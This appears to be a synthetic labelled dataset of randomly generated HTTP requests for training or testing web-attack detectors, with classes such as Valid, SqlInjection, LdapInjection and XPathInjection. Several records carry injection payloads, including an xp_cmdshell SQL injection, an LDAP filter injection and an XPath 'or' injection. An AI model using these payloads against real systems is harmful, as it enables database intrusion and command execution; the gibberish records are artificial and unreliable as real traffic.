If-Range: "@KiSTSQKi9m4H4ar"
Max-Forwards: 320
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: Basic UXVtaXBuOkNhc2RyZXRl
Authorization: NTLM aGlvZmVhb3dsaHJlMmFpc3JBcEdSbmFPZW5pZVJuamNlaDB3SHNsZnM1YmU=
Range: 2-37781,-037,39-
Referer: http://dfncl3tt.com/r7eee/wasa/0nya.msf
TE: trailers,trailers
Trailer: Upgrade
User-Agent: Mozilla/8.9 (compatible; MSIE 0.3; WinNT; HbetoRtie)
UA-CPU: Sparc
UA-Disp: 8924,467,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 470x662
Via: 2.7 126.149.157.164, dznaih/6.5 173.186.73.207
Transfer-Encoding: ebr76; ut51g=htlohZ4
Upgrade: e29ode/7.2, utejfe/1.6, Rac/7.2, sarbr/4.4
X-Forwarded-For: 184.57.165.17
X-Serial-Number: 480631962550690489
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35497
Start - Id: 24917
class: Valid
GET /ccn/obK.cbJZuZPzI/na8ebe.jpeg?heo0yuiGetn1bnd=t5r8&wtoBoaaf=%5DsO%5D&-9A@pdf=496&.-rkz=39&hwysnu=tJQkB7Y&oNenroW=9i+zzaha%2Faewsa&5xOawhpo58odu=4828&edsflqa5e=n8irxIaazr%3A&esTuh=eA+%24eier&mzLgen=tahd%29imri HTTP/1.1
Host: 120.88.197.129
Connection: keep-alive
Accept: application/*;q=0.3
Accept-Charset: *
Accept-Encoding: *
Accept-Language: rrr-ca4v;q=0.7, sdqqenn-ceoN0;q=0.1, mdt-1ctdneo
Cache-Control: no-transform
Client-ip: 210.63.57.145
Cookie: wx0io=hncob9i
Cookie2: $Version="0"
Date: Fri, 17 Feb 06 17:41:02 CET
ETag: W/"y@1pvLzzV8NRAaUL"
Expect: 100-continue
From: pwmfp9h@tptOa1oce.de
If-Modified-Since: Sun, 17 Jul 05 06:08:10 UTC
If-Unmodified-Since: Tue, 07 Dec 04 10:19:00 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 18 Nov 08 20:22:06 CET
Max-Forwards: 9602
MIME-Version: 2.5
Pragma: ra=ss
Proxy-Authorization: Digest opaque="nodeiar"
Authorization: Basic YXNjZTpJM0lvbw==
Range: -47448,86125-296,-084
Referer: http://www.tuikoe.net/onDp/rsiibo.asmx
TE: trailers,deflate;q=0.6,trailers
Trailer: If-Range
User-Agent: Mozilla/9.0 (Machintosh; U; Mac OS X 8.6; 2l-2a; rv:6.2.2) Gecko/08227537
UA-CPU: MIPS
UA-Disp: 899,4850,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 5160x7333
Via: 1.3 www.rrw3plno.html:122, HTTP/9.0 www.ntp0aO.shtml, 8.4 www.shsih.png
Transfer-Encoding: cjcuh
Upgrade: eioe/8.0, tttl/1.6, aeanad/4.0
Warning: 316 235.226.9.117:9331 "tussPlVme6tet" 
X-Forwarded-For: 45.246.59.205
X-Serial-Number: 2466804840974150
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24917
Start - Id: 41688
class: SqlInjection
GET /f2doxi5rbrsfhir/gwde@y7ItGUboYGqw/t5sheqnh/raBzx9D7HAtS9p/wPep.W_i4cA/dw5uvqqKXx@x4a/39/oF/a-of_r8TnYWJE/fZY4wSe.jpeg?eoitfj7eolhyo=%27+++++group+++by++users.id++++having+++9773%3D9773&ewnteneizie76d=0&Gwp-0aEpasswdUoORb=531 HTTP/1.1
Host: www.e5os.st
Connection: keep-alive
Accept: text/*;q=0.3, audio/x-wav;q=0.5
Accept-Charset: utf-8, shift_jis, iso-8859-7;q=0.3, hz-gb-2312;q=0.6
Accept-Encoding: deflate, deflate, identity
Accept-Language: sns4ylt-caNg, 9fOlu-d
Cache-Control: only-if-cached
Client-ip: 141.64.26.126
Cookie: th=@cscriptm;execVbetweenIconnectSx95=lirdon8ssvhcopenW
Cookie2: $Version="1"
Date: Thu, 15 May 08 07:31:07 UTC
ETag: "_JdHqc5lPurFiLmz"
Expect: 100-continue
From: ube8gesO@rdptemmi.st
If-Modified-Since: Sun, 24 Aug 08 20:53:29 GMT
If-Unmodified-Since: Wed, 28 Jan 09 20:35:06 CET
If-Match: "xoPSHlY2Od6._xoDTKi"
If-None-Match: *
If-Range: "1TjoPZvynQQX@yLAV"
Max-Forwards: 4
MIME-Version: 7.5
Pragma: pmhldf=lo
Proxy-Authorization: NTLM bGVkbGpuZW1ucXRsb2JnZWJiZWVmVW0ycGVzbWxpaTRWbVNHeQ==
Authorization: Aato8 oEoat=n1i8daro
Range: -39
Referer: http://www.rfsre.cz/1amntc/mnvqs/ft09d/HssWhwT/eieaa.tiff
TE: deflate;q=0.2,chunked,trailers
Trailer: Max-Forwards
User-Agent: 4dd2 (2qxmIm6; ditZdd5; i4thw8V9; tC60A8)
UA-CPU: PowerPC
UA-Disp: 1862,8220,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 0003x3071
Via: HTTP/1.7 www.Eeih.png, 8.5 www.sokh38p.jpeg
Transfer-Encoding: deflate
Upgrade: Him/6.1, srtana/5.1, 5si/1.9, fHrl2k/2.1
Warning: 118 2.156.64.121 "naglietszhgs" 
X-Forwarded-For: 39.208.247.75
X-Serial-Number: 611965021882313
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41688
Start - Id: 31171
class: Valid
GET /7tlRta4bdido0lu/rihs8noaaeinuad0ta/hISrTee/FexecmE3BopenX@S/ezC7LHscMYK0Ny/iO2OwF-BBT.jpg?r1g=h1Eethtded0h7qreac&mnhwoe5cajh1=4zfEp5ZyeUu&aonisL=toun41yetxtDsd&ghsogATnmio5i=7ZbTbZe5 HTTP/1.0
Host: www.hLcE.uk
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: tes0n-ltr6miia, toesqutu-nteatrod;q=0.7
Cache-Control: max-stale
Client-ip: 14.186.226.223
Cookie: ehatn8ntjbntag=cGQ0-X247
Cookie2: $Version="352"
Date: Fri, 09 Jan 04 12:42:32 CET
ETag: W/"fQ1DqsM.rEkeMZ-"
Expect: rair
From: xdis0@redoex.de
If-Modified-Since: Thu, 13 Aug 09 07:15:42 CET
If-Unmodified-Since: Mon, 29 May 06 21:53:37 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 7329
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: t31q4h eigtbotb=ilotn
Authorization: Basic ZWlzZXZvaTp0MnR0b2M=
Range: 41-,7530-978
Referer: http://ydkOoe.uk/0ywnv/sedwv/a7TxLi70/fdnYHbb.nsf
TE: chunked;q=0.2,trailers
Trailer: If-Modified-Since
User-Agent: zbttmeedonbwxrL9fn
UA-CPU: StrongARM
UA-Disp: 2491,001,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 7646x4515
Via: igdEo/7.3 www.eehumoLp.shtml, raoyt/8.7 88.125.247.82
Transfer-Encoding: identity
Upgrade: Lr9lei/6.9, imH4t/7.3
Warning: 047 www.AtoX9nes.js "hsmitves7S" "Sun, 30 Aug 09 10:25:13 CET"
X-Forwarded-For: 193.229.38.157
X-Serial-Number: 1704318559609
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31171
Start - Id: 36913
class: LdapInjection
PUT /nhhusnnktcTd2hAo/iRvjYcZ/2ihi_/hGjn6.3u/hENMGe-2dWYL14lzL/metalocation37sock_stream/tbh9/pShomeWA/lOff8B-BAg/XpsXb.shtml? HTTP/1.1
Content-Length: 49
Content-Language: aea
Content-Encoding: deflate
Content-Location: http://www.pzdas.ch/xpgelig/uhnshae/tnxdt/sacned.css
Content-MD5: YmRwZW90dWVvbnRlbnZoZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 22 Aug 05 07:12:44 UTC
Last-Modified: Thu, 28 May 09 17:28:01 CET
Host: 244.186.50.20
Connection: Ioah
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: no-transform
Client-ip: 46.117.86.31
Cookie: et0tntdndxart=045553921
Cookie2: $Version="09"
Date: Mon, 13 Sep 04 02:06:41 UTC
ETag: W/"Kz7Dmc-HYJYpwWQd6ii"
Expect: t7eiih=1zBcuhe;elVew
From: dhafadn@folsiatle.com
If-Modified-Since: Wed, 29 Oct 08 22:40:31 CET
If-Unmodified-Since: Tue, 06 Nov 07 21:21:48 CET
If-Match: *
If-None-Match: "WiPAMLVUgDZFtsCu7"
If-Range: Sat, 19 Sep 09 21:57:07 UTC
Max-Forwards: 645
MIME-Version: 8.8
Pragma: inrrrkeh='e'
Proxy-Authorization: NTLM cmVlZXRyZWdpYWJlb3N0ZUFPdGd6bm85Ym5jbndpdG5jc2Vxc2J1YVNlcg==
Authorization: Digest username="snspsns"
Range: 03-
Referer: /AhteiS.jpg
TE: trailers,gzip;q=0.5
Trailer: Warning
User-Agent: Utca (nwCdV8X)
UA-CPU: Sparc
UA-OS: Win98
UA-Pixels: 015x0585
Via: 7.8 203.76.183.211:24, 8.5 143.97.245.78
Transfer-Encoding: gzip
Upgrade: tn40Sc/6.9, 8ysiw/2.7, ehl4of/1.6
Warning: 029 17.241.6.13:76 "8tya4sneebfR" "Fri, 14 Mar 08 05:58:01 GMT"
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

aletobtcoegt=eiIh)(&(objectClass=Tn*)

End - Id: 36913
Start - Id: 9784
class: Valid
GET /IeaOtkoyiiuc31b80sg/tkB_XEE5IEQaLFbVsR/tyeEmKgLC@lxuejly5iX/eeIIa./2Ocgs0ttnr/t1N4t/wSVZ.jpg? HTTP/1.0
Host: www.mke3rt.st
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *;q=0.2
Accept-Encoding: identity;q=0.0
Accept-Language: *;q=0.7
Cache-Control: fnsdiur='6w'
Client-ip: 0.108.82.240
Cookie: 4hel8Ll=21;q6wherelBE%uAGlB=rhle2aeiBmsO;agUg9EIR4logA=1;mtao1t5=tzY5bPahiq00;ACSwgetuscriptM-ot@q=2
Cookie2: $Version="07"
Date: Sun, 21 Sep 08 06:34:54 GMT
ETag: W/"rtGj6O_re.QcY_gzttt"
Expect: lu6bese=dpkdeacO
From: e7mzm@im8r.uk
If-Modified-Since: Sun, 26 Feb 06 15:18:57 UTC
If-Unmodified-Since: Sun, 20 Mar 05 14:38:33 CET
If-Match: "KRd7vH0GbYrxSUI"
If-None-Match: "ifvdjwJR3oBkvU6"
If-Range: Wed, 12 May 04 09:08:42 CET
Max-Forwards: 626
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: IsiUr 6twklat=tyei
Authorization: Ttrts tNc3tO=idhOt
Range: 2-,05-93,-803749
Referer: /ps44goh/ax4d/tehE/mnaot/inrNtl.ace
TE: trailers
Trailer: Host
User-Agent: asC.3enV0 http://www.szaihel.it
UA-CPU: PowerPC
UA-Disp: 152,310,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 493x9189
Via: 1.8 www.Eh1usv.gif
Transfer-Encoding: gzip
Upgrade: cds2Qc/0.8, daru/8.7, roew/2.1, hnm/9.5, saile/8.5
Warning: 073 www.nechC.html "cxeieM" 
X-Forwarded-For: 178.23.246.133
X-Serial-Number: 576958845
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9784
Start - Id: 35779
class: XPathInjection
GET /5mHwF4o/pPc-SOqVXX/tTimh/ecRf/ayPPI8JKCrX2_eRn/atcdjRcfiiydaohy/ePJSm/cg/zthiicr/ubRbGy4olM/dwv/7jxtermLgasl.shtml?e7lftjrXemt8=Oeeep%2FdR%2Fy%2Fchild%3A%3Anode%28%29%5B++++position%28%29%3D8%5D++%7C++rnac%2Fao%2Fu%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D62%5D+or++%27Si%27+%3D%27 HTTP/1.1
Host: 12.125.83.110
Connection: close
Accept: image/*;q=0.5, video/mpeg
Accept-Charset: x-mac-roman;q=0.7, windows-1255, macintosh
Accept-Encoding: gzip;q=0.4, compress;q=0.9, compress;q=0.0, identity;q=0.5
Accept-Language: ehotea-y, gfarki-rs;q=0.3
Cache-Control: max-age=2
Client-ip: 76.216.98.195
Cookie: 0s=if
Cookie2: $Version="11"
Date: Mon, 28 Jul 08 06:15:04 UTC
ETag: "Svs2sVNwEB_MZhVF"
Expect: 100-continue
From: Nginnon@eatp.net
If-Modified-Since: Fri, 25 May 07 24:26:07 CET
If-Unmodified-Since: Tue, 16 Jun 09 18:19:17 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 21 Oct 04 01:43:36 GMT
Max-Forwards: 09
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: Basic Z3Nwcjp5bVNvZWJqQQ==
Authorization: Digest opaque="rreati"
Range: -777
Referer: http://www.psdy.be/oEcodL.exe
TE: chunked,gzip,trailers
Trailer: If-None-Match
User-Agent: rgwy/4.7
UA-CPU: x86
UA-Disp: 7633,886,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 072x540
Via: 3.9 134.116.89.96
Transfer-Encoding: compress
Upgrade: homom/1.1, t6u/8.5, 6mrrds/0.2, yassta/4.9
Warning: 192 108.52.172.141:8 "C24i" 
X-Forwarded-For: 142.75.180.148
X-Serial-Number: 76346
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35779
Start - Id: 33614
class: Valid
PUT /inP@nSQ/0s8ZAT_@_UdztkkZmo7@/lRleteThutdlpd/tlLqFitLWL2M/C.y/Gkj74Hm/nFRc_/m9mqF.-.shtml? HTTP/1.0
Content-Length: 250
Content-Language: ad8h
Content-Encoding: deflate
Content-Location: /rdr5E/rimbsaay/th1ub7f/Iroi.wmn
Content-MD5: dWFlMm5sM2FuemlxbnRlYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 21 Oct 06 14:55:10 UTC
Last-Modified: Fri, 16 Jun 06 18:05:44 GMT
Host: www.p9rtrtex.biz:80
Connection: keep-alive
Accept: text/*
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 239.255.99.116
Cookie: Rhas2=e servicesn;30DinputtJboot.ini=r]Es?;omb2rmsRNo=eSxMviU9U;ashnhrn4femg=n+n;zPjh1connectCJYV=gesehl8orrmrIitu
Cookie2: $Version="43"
Date: Mon, 26 Jun 06 11:56:14 UTC
Expect: 09mhtnBl=aFdo7s
If-Modified-Since: Tue, 14 Oct 08 14:27:40 GMT
If-Unmodified-Since: Thu, 22 Jan 09 09:49:28 UTC
If-Match: "4bN97Jcb1OQRzH-"
If-None-Match: *
If-Range: Tue, 14 Sep 04 17:02:31 UTC
Max-Forwards: 023
MIME-Version: 8.4
Pragma: no-cache
Authorization: Digest nonce
Range: 409459-7,-297771
Referer: http://www.oetnhra.cz/cpnHle/oanm.dll
TE: trailers,trailers,trailers
User-Agent: rratlUutk/5.1.5.7.3
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 4177x0354
Via: nir9/4.4 www.3eta.gif:0, adn/3.5 232.56.51.75
Transfer-Encoding: deflate
Warning: 832 www.ehihKame.gif "khIC0" 
X-Forwarded-For: 246.11.40.158

zn7tSmi=662&RrhsT=~ha 9|mpmrk noltlngn&muuew=04344&wenni=iStXbhrvhisgtee&R2u1oh06neem=rhIeuaierreI&lljtintulqfne=d.0t9P&UhitfttiUenniwa=hxesbqonadt3lyyEof&Y8i=sshngroup bye7:tS&2tLtrte2ian=-vot:r i&sTRMIbXcB8=on&oi=\elVy\upasswdsnlnu ltry

End - Id: 33614
Start - Id: 29115
class: Valid
GET /nRirFexat6/JF/ey6rtete9golkeh8l/ukQX/ZVWNfQpc8samV/eHPr50d/ieiRtanleboft/ufyM8-uX2.ZtmlYC/lrFt8.nsf?rew1w=rsjs5-e9%3BJi1to0&xs=%3Bc%7E&bil1=7WfJQKT&sheeecip=2t&csdthHeeoYi7=m HTTP/1.1
Host: www.eare4attv.biz
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-chinesesimp;q=0.9, isiri-3342;q=0.4, koi8, iso-8859-9;q=0.9, isiri-3342;q=0.9
Accept-Encoding: identity, identity, deflate;q=0.3, deflate;q=0.6
Accept-Language: *;q=0.0
Cache-Control: 4ea9na='p'
Client-ip: 238.223.12.222
Cookie: lihaeKs=42;oeu5hlyhtNdnoe=ieu;eOtTsicmD=7;ohesafhhi4=oksmetast0swgett2;0iolSseeeho=3182107128;osrffno=rtoEnmoyy97gei
Cookie2: $Version="87"
Date: Thu, 11 Mar 04 22:18:58 UTC
ETag: "xI.D_BAdBZOfC@i"
Expect: 100-continue
From: e1ae@Pieni5s0wn.cz
If-Modified-Since: Mon, 12 May 08 06:03:12 GMT
If-Unmodified-Since: Sun, 30 Nov 08 02:24:01 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 58
MIME-Version: 2.3
Pragma: no-cache
Proxy-Authorization: NTLM cmVvbGxhZXN1bGVsQWRsZXVzdG9pczk1aHJzbHdyYTlzbmV0bTZl
Authorization: Basic aWRmcGpkaTp3bXlub2Fw
Range: 71-
Referer: /lotlbeah/0whPut/3Oin.png
TE: deflate,trailers,chunked
Trailer: TE
User-Agent: Mozilla/8.6 (Windows; U; WinNT 9.9; er-ge; rv:5.4.0) Gecko/49263552
UA-CPU: MIPS
UA-Disp: 8585,7282,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 325x832
Via: zmtt/6.6 www.axoNhm.png:40, HTTP/9.4 www.unftt.png, 2.1 www.onnn.htm:02
Transfer-Encoding: gzip
Upgrade: rotr/8.6, 0vwd/6.0, 7ye/1.1, etnead/3.9, 7aate3/3.4
Warning: 711 www.heqs.tiff "w6anEbhagmiefnfsan" 
X-Forwarded-For: 244.82.254.221
X-Serial-Number: 1881707
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29115
Start - Id: 41074
class: SqlInjection
GET /cnpqe/TTy1m/necSkWRsJBHn/etmcmoehe/mHqJkSU/rNki6TG/Efttnmemegetelem4es9.mdb?aAclti8tp2M=4%3Deux%26Iz&homeQnodelboot.inihLb9IKf=%3B&yBNp@.17=e4tOspiouarc&escssia=%27%3BEXEC+++++master.dbo.xp_cmdshell++++%27cmd.exe&tat=e_JtpUy1zJQ HTTP/1.1
Host: 170.199.214.219
Connection: aEno
Accept: */*;q=0.8
Accept-Charset: isiri-3342, iso-8859-8;q=0.5, x-mac-chinesesimp, windows-1255;q=0.0, x-mac-chinesetrad
Accept-Encoding: *
Accept-Language: C7pOrt1-9qern, htnNltgb-dEin4ant;q=0.6, i-iojro;q=0.9, mrtv-rtfnet;q=0.8
Cache-Control: only-if-cached
Client-ip: 26.111.242.56
Cookie: NG3-=6|insertm0Nb0aasbys(;3MTFYino=7;4rghvnat=nctwu;sittc=: 
Cookie2: $Version="187"
Date: Mon, 18 Feb 08 19:26:34 UTC
ETag: "dAZmn_EU_5mYota"
Expect: sirec=kn4ahes9
From: ttytsmgz@lbtfnlH.de
If-Modified-Since: Fri, 21 Oct 05 21:23:08 UTC
If-Unmodified-Since: Fri, 18 Nov 05 06:01:20 CET
If-Match: "pwn5gxFi5EmwbP7"
If-None-Match: *
If-Range: "jH.HSSGdokJL@Wxsx"
Max-Forwards: 32
MIME-Version: 9.5
Pragma: aAhy='lthsed'
Proxy-Authorization: NTLM c3RhdnNuaU9hMWF0VHRnczFzMTF0N29wZWl4d2NlTG5ubg==
Authorization: NTLM ZXJ3Zm9kcnFsdXVpaHNuc29vbjBxc3VibHNlY3JlczJuZmdlR0l3cm5s
Range: 253-,679517-254
Referer: http://www.eaiddie8.net/1siEyud/ancheeti.doc
TE: trailers
Trailer: Max-Forwards
User-Agent: Mozilla/4.1 (compatible; owaeAsEttc; Mac OS X; lhlEdEh; xmtnww; vhknmge)
UA-CPU: 68000
UA-Disp: 2063,773,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 194x0684
Via: FTP/5.9 www.etcu.htm
Transfer-Encoding: identity
Upgrade: t1er/5.7
Warning: 764 76.214.33.91 "Rbeodtq" "Fri, 19 Mar 04 18:10:47 GMT"
X-Forwarded-For: 11.72.236.31
X-Serial-Number: 54708069609443708
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41074
Start - Id: 9787
class: Valid
GET /nyqW1oBaZ-In/8u.AKJtj/ktmp3/aaegfrtplriWledtar/aahdj/eecef/xSDHP/mbd653/uGAqUSJobjectzU4jrlz/ulhioiesorswme.php?ec=Tcthttbsdeo&RlS=e0at&OGHGnetcatxp_systemNK-0ls=tmpo%28e&ihhenttrh7os=%3Dc+or&td=45394842&Zwboot.inivvarSfu=361&iss2pi8nha99h=%3Ers+&r3nnheetome=inputelkaewiL%28oviie&sba=Tdm%28St&lhRnCu=pbugC0ctlyl%3Adeps8l&911_red=e%2Ftie%29%2F7passthru&wesstgmeDn4=DTfociT7nahte+a&taiHmrivmEe=t&afE2eirahba=u&rjdotnheae=uytnlpearoorsg HTTP/1.0
Host: www.Tibtenjns.gov
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: euc-tw;q=0.4
Accept-Encoding: identity, compress;q=0.6, gzip, deflate;q=0.8
Accept-Language: e-Hanwtemr, saai-rgur;q=0.4, rrm1-0nwizkx
Cache-Control: no-store
Client-ip: 161.105.192.68
Cookie: tna5l=5709607;eeeccr3jriht=4lp  ;tle:xl letsewp-m;a2l81o78c20bilg=lea;7Dn7fk17S2=5643
Cookie2: $Version="74"
Date: Mon, 21 Sep 09 08:03:08 UTC
ETag: W/"@QgOOO7BxNMt3_qFD"
Expect: 0oNeitt
From: e7mzm@im8r.uk
If-Modified-Since: Sun, 26 Feb 06 15:18:57 UTC
If-Unmodified-Since: Sun, 03 Jun 07 05:46:52 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 12 May 04 09:08:42 CET
Max-Forwards: 0
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: IsiUr 6twklat=tyei
Authorization: Ttrts tNc3tO=idhOt
Range: 2-,05-93,-803749
Referer: http://slaDn.fr/nl7uEsuo/unrhe/e6oo8/se7xh1hH/tfszde.asp
TE: gzip,deflate;q=0.0,deflate;q=0.6
Trailer: Trailer
User-Agent: Mozilla/5.4 (compatible; MSIE 7.6; Linux i586; iwwrnS)
UA-CPU: PowerPC
UA-Disp: 152,310,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 493x9189
Via: 1.8 www.Eh1usv.gif
Transfer-Encoding: identity
Upgrade: cds2Qc/0.8, daru/8.7, roew/2.1, hnm/9.5, saile/8.5
Warning: 073 www.nechC.html "cxeieM" 
X-Forwarded-For: 215.67.208.226
X-Serial-Number: 576958845
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9787
Start - Id: 30490
class: Valid
GET /tam08oeufbfnwyahk/oxhohcisEnEfki/iaNpgr/70Dfd@zd.Id/e6upee4ruipaia/mn1oebdrbMi/030HEyse5SOnwRYEX/m1rU63Eedaee49r/er8oaarep/frFetupren95tc.mspx?sica4e6tnesl6h=Gupdatezxml%3Cni%3Ea%24h&UExnnt=slft&1s=5&si=lIlpncatag&dtreaytegeeo=+8Hekesboi-autoexece&_f4DALC.1rM7=teeRoa%3Ao%262ndtatb&or=cnL&jdzz=rtd4&eytctwsemn=%2FEttNtah%24etcjo&flfBrbeeO=nawciadmeaDo&bndxtReiBn=98840287 HTTP/1.1
Host: 202.63.245.133
Connection: close
Accept: */*;q=0.6
Accept-Charset: windows-1258, x-mac-japanese
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: no-transform
Client-ip: 88.30.224.178
Cookie: samIrNBxENMyh=pczzeODX
Cookie2: $Version="618"
Date: Tue, 29 Aug 06 08:10:27 UTC
ETag: W/"we5GnCIoeCGVSE7A"
Expect: 100-continue
From: l8ngh@nEai2iouaS.be
If-Modified-Since: Tue, 17 Aug 04 08:54:01 GMT
If-Unmodified-Since: Mon, 16 Apr 07 22:06:36 CET
If-Match: *
If-None-Match: "@Mi6reWATWl30Lo1LQyE"
If-Range: Wed, 20 Apr 05 04:14:58 GMT
Max-Forwards: 6392
MIME-Version: 0.5
Pragma: 9h0uu='7ttenie'
Proxy-Authorization: NTLM dW5pR3JsY3ZhaUVzZXJldHRkOVNQdWhldGJhdXc0N25ldmRuaVNiRWJvc2lk
Authorization: Hzrt qa3fyl=rinmes
Range: 32-29,033002-861540
Referer: /eaie/erEwtlc/smefsa/ipthne5u/QAze0p1.mdb
TE: trailers,deflate;q=0.3
Trailer: Transfer-Encoding
User-Agent: hMF52p http://www.l1iej.cz
UA-CPU: x86
UA-Disp: 273,999,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 710x3564
Via: FTP/5.5 80.143.125.18:6359
Transfer-Encoding: identity
Upgrade: tsn/6.7
Warning: 638 71.219.15.61 "hmtn" "Sat, 22 Jan 05 06:21:26 UTC"
X-Forwarded-For: 50.177.217.100
X-Serial-Number: 9887656877315806
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 30490
Start - Id: 18891
class: Valid
GET /jRMxrLaNbiyV9i/eE7KGJ6cxnSfC/ernme.tiff?ehiihhrrr=o%3ETrH&yt1auAor=49mOaslEssz9tts&eelsksbeesedam=68453804&Tofieodt6q=wmtVyc0xu0oa HTTP/1.1
Host: www.spennisnoe.it
Connection: 2kdsCw
Accept: audio/*;q=0.2, application/x-tar, audio/basic;q=0.3
Accept-Charset: iso-2022-kr, shift_jis;q=0.7, iso-10646-ucs-2;q=0.4, x-mac-arabic
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 234.213.186.59
Cookie: 5gCDhmpppahI9By=4Q4-Pz;l9iob=EoIS
Cookie2: $Version="660"
Date: Sun, 13 Mar 05 11:07:33 UTC
ETag: W/"-fRtl1f-ZoH6-bbY0-_"
Expect: u5zdie
From: HiPzZ@7ede4.st
If-Modified-Since: Sat, 07 Feb 09 16:50:31 CET
If-Unmodified-Since: Sat, 25 Jul 09 02:46:40 GMT
If-Match: *
If-None-Match: *
If-Range: "CWvTIjGNIiEiPjhe9wvp"
Max-Forwards: 6029
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: Basic b2FpdjpJaWlzMWFwaA==
Authorization: Digest qop=auth-int
Range: 8-99083,-370
Referer: /dtntRt/8sn6wtfT/hvLfst/ewMbhyEi/Ehaoe.jpeg
TE: gzip;q=0.8,gzip;q=0.3
Trailer: Cache-Control
User-Agent: adofadb6hpeqdosn
UA-CPU: MIPS
UA-Disp: 708,1125,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 592x5506
Via: HTTP/9.2 www.Eeew.jpg
Transfer-Encoding: compress
Upgrade: nash0s/1.5, Xiiie/7.6
Warning: 226 www.njsira.shtml "3eahntvtanuw" 
X-Forwarded-For: 180.173.9.202
X-Serial-Number: 47230032
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 18891
Start - Id: 13149
class: Valid
GET /dX6QzVYzjC8WF/IMoqlherl7eioh/t.pxNJ/7qz/7nidtwibe/-QNqcmdxmlpositiontmpBcIrW/rw9azsa4/7ysrmMewisSekr.cgi? HTTP/1.1
Host: 175.46.0.40
Connection: close
Accept: video/*, image/*, video/quicktime;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: no-cache
Client-ip: 122.222.217.238
Cookie: wr=n8n6LG_N8k;swtr=nh3s5Er;Lirlgltfreii=72
Cookie2: $Version="13"
Date: Sun, 02 Jul 06 05:49:17 CET
ETag: "TQJnjWYzeU82nzLT4_LW"
Expect: y29ldf=exti
From: rBs84eg@im6v.st
If-Modified-Since: Sun, 15 Mar 09 22:19:04 UTC
If-Unmodified-Since: Tue, 30 Nov 04 21:18:45 GMT
If-Match: "B6n7ECgqfSjGiel"
If-None-Match: *
If-Range: *
Max-Forwards: 2
MIME-Version: 0.8
Pragma: e='mt'
Proxy-Authorization: NTLM ZHpnY3RvdXQyVG5paW9vZHNlaGFDSDNzb2VwSHdleWF0RE9lYQ==
Authorization: Basic ZWNuTmJtOlNnZjlvemE=
Range: -22,686-,439169-
Referer: /yuyMhnn0/misiit/Nitje6.js
TE: deflate;q=0.6,deflate;q=0.5,deflate
Trailer: Max-Forwards
User-Agent: yvOy7B http://www.strgypi.com
UA-CPU: Sparc
UA-Disp: 806,0738,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 6456x555
Via: 5rQld/0.9 150.157.183.203, ehsas3/0.5 67.197.239.17, 9.7 85.90.184.24:5125
Transfer-Encoding: identity
Upgrade: ITn/7.8, tiehs/3.3, tet/0.0, M2r/6.0
Warning: 939 218.206.239.72 "inmra" "Wed, 17 Aug 05 19:20:41 CET"
X-Forwarded-For: 141.250.177.130
X-Serial-Number: 193112080
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13149
Start - Id: 31305
class: Valid
